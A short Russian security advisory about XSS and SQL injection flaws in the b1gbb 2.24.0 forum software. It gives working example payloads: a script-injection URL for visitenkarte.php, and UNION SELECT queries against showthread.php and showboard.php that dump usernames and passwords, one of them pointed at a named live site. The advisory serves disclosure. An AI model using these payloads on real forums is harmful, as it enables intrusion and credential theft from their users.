Программа: b1gbb 2.24.0

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему и выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «user» сценарием visitenkarte.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

Кроме того уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием showthread.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Примеры:

//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6, concat(username,passwort),8%20FROM%20
cebb_user%20%20where%20id=1/*

/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6, concat(username,passwort),8%20FROM%20
cebb_user%20%20where%20id=1/*

http://www.gkovacs.de/forum/showboard.php?id=-1%20union%20
all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20
FROM%20cebb_user%20%20where%20id=1/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии